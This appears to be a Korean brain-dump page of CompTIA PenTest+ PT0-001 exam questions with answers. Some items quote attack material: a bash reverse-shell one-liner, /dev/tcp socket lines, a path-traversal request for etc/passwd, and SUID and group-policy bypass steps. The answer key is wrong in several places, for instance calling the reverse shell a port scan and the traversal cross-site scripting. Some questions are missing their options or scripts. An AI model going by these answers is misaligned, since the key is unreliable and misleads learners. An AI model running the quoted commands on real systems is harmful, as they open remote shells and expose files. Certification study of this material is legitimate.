최신 PT0-001 무료덤프 - CompTIA PenTest+ Certification

문제1

Which of the following reasons does penetration tester needs to have a customer's point-of -contact information available at all time? (Select THREE).

A. To report critical findings

B. To update the statement o( work

C. To report the latest published exploits

D. To report indicators of compromise

E. To report findings that cannot be exploited

F. To update payment information

G. To report a server that becomes unresponsive

H. To report a cracked password

정답: A,D,G

문제2

A penetration tester discovers SNMP on some targets. Which of the following should the penetration tester try FIRST?

A. Use default credentials.

B. Sniff SNMP traffic.

C. Conduct a MITM.

D. Upload a new config file.

정답: A

문제3

The following command is run on a Linux file system:
Chmod 4111 /usr/bin/sudo
Which of the following issues may be exploited now?

A. Kernel vulnerabilities

B. Unquoted service path

C. Sticky bits

D. Misconfigured sudo

정답: C

문제4

After an Nmap NSE scan, a security consultant is seeing inconsistent results while scanning a host. Which of the following is the MOST likely cause?

A. Services are not listening

B. A firewall/IPS blocked the scan

C. The network administrator shut down services

D. The host was not reachable

정답: B

문제5

A company performed an annual penetration test of its environment. In addition to several new findings, all of the previously identified findings persisted on the latest report. Which of the following is the MOST likely reason?

A. Infrastructure is being replaced with similar hardware and software.

B. The penetration testing tools were misconfigured.

C. Systems administrators are applying the wrong patches.

D. The organization is not taking action to remediate identified findings.

정답: D

문제6

A penetration tester is required to perform OSINT on staff at a target company after completing the infrastructure aspect. Which of the following would be the BEST step for the penetration tester to take?

A. Search the Internet for information on staff such as social networking sites.

B. Visit the client and use impersonation to obtain information from staff.

C. Obtain staff information by calling the company and using social engineering techniques.

D. Send spoofed emails to staff to see if staff will respond with sensitive information.

정답: A

문제7

A company requested a penetration tester review the security of an in-house-developed Android application. The penetration tester received an APK file to support the assessment. The penetration tester wants to run SAST on the APK file. Which of the following preparatory steps must the penetration tester do FIRST? (Select TWO)

정답: E

문제8

A penetration tester wants to target NETBIOS name service. Which of the following is the most likely command to exploit the NETBIOS name service?

A. nmap

B. arPspoof

C. responder

D. burpsuite

정답: B

문제9

Performance based
You are a penetration Inter reviewing a client's website through a web browser.
Instructions:
Review all components of the website through the browser to determine if vulnerabilities are present.
Remediate ONLY the highest vulnerability from either the certificate source or cookies.

정답:

문제10

A security analyst has uncovered a suspicious request in the logs for a web application. Given the following URL:
http:www.company-site.com/about.php?i=_V_V_V_V_VetcVpasswd
Which of the following attack types is MOST likely to be the vulnerability?

A. User enumeration

B. Directory traversal

C. Cross-site scripting

D. Remote file inclusion

정답: C

문제11

A penetration tester needs to use Nmap to scan a host with a very low speed so the WAF or IPS/IDS is not triggered. Which of the following command-line parameters should be added to the Nmap command?

A. -sP 10

B. -sV

C. -t 1

D. -t 5

정답: C

문제12

A penetration tester is testing a web application and is logged in as a lower-privileged user. The tester runs arbitrary JavaScript within an application, which sends an XMLHttpRequest, resulting in exploiting features to which only an administrator should have access. Which of the following controls would BEST mitigate the vulnerability?

A. Implement authorization checks.

B. Prevent directory traversal.

C. Add client-side security controls

D. Sanitize all the user input.

정답: A

문제13

A client needs to be PCI compliant and has external-facing web servers. Which of the following CVSS vulnerability scores would automatically bring the client out of compliance standards such as PCI 3.x?

A. 2.9

B. 5.9

C. 4.0

D. 3.0

정답: C

문제14

After gaining initial low-privilege access to a Linux system, a penetration tester identifies an interesting binary in a user's folder titled "changepass"
-sr -xr -x 1 root root 6443 Oct 18 2017 /home/user/changepass
Using "strings" to print ASCII printable characters from changepass, the tester notes the following:
$ strings changepass
Exit
setuid
strmp
GLINC _2.0
ENV_PATH
%s/changepw
malloc
strlen
Given this information, which of the following is the MOST likely path of exploitation to achieve root privileges on the machines?

A. Copy changepass to a writable directory and export the ENV_PATH environmental variable to the path of a token-stealing binary titled changepw. Then run changepass

B. Run changepass within the current directory with sudo after exporting the ENV_PATH environmental variable to the path of '/usr/local/bin'

C. Create a copy of changepass in the same directory, naming it changpw. Export the ENV_PATH environmental variable to the path "/home/user'. Then run changepass

D. Export the ENV_PATH environmental variable to the path of a writable directory that contains a token-stealing binary title changepw

정답: B

문제15

A penetration tester is attempting to open a socket in a bash script but receives errors when running it. The current state of the relevant line in the script is as follows:

Which of the following lines of code would correct the issue upon substitution?

A. open 3</dev/tcp/${HOST}/${PORT}

B. open 0<>/dev/tcp/${HOST}:${PORT}

C. open 3</dev/tcp/$[HOST]/$[PORT]

D. exec 0</dev/tcp/${HOST}/${PORT}

E. exec 0</dev/tcp/$[HOST]:$[PORT]

F. exec 3<>/dev/tcp/${HOST}/${PORT}

정답: E

문제16

The following line was found in an exploited machine's history file. An attacker ran the following command:
bash -i >& /dev/tcp/192.168.0.1/80 0> &1
Which of the following describes what the command does?

A. Redirects a TTY to a remote system.

B. Removes error logs for the supplied IP.

C. Grabs the web server's banner.

D. Performs a port scan.

정답: D

문제17

A penetration tester executes the following commands:
C:\>%userprofile%\jtr.exe
This program has been blocked by group policy
C:\> accesschk.exe -w -s -q -u Users C:\Windows
rw C:\Windows\Tracing
C:\>copy %userprofile%\jtr.exe C:\Windows\Tracing
C:\Windows\Tracing\jtr.exe
jtr version 3.2...
jtr>
Which of the following is a local host vulnerability that the attacker is exploiting?

A. Insecure file permissions

B. Writable service

C. Shell escape

D. Application Whitelisting

정답: A

설명: (DumpTOP 회원만 볼 수 있음)

문제18

When communicating the findings of a network vulnerability scan to a client's IT department which of the following metrics BEST prioritize the severity of the findings? (Select TWO)

정답: A,C

문제19

Given the following script:

Which of the following BEST describes the purpose of this script?

A. Debug message collection

B. Event collection

C. Log collection

D. Keystroke monitoring

정답: D

최신 PT0-001 무료덤프 - CompTIA PenTest+ Certification

우리와 연락하기

유용한 링크

최신 업데이트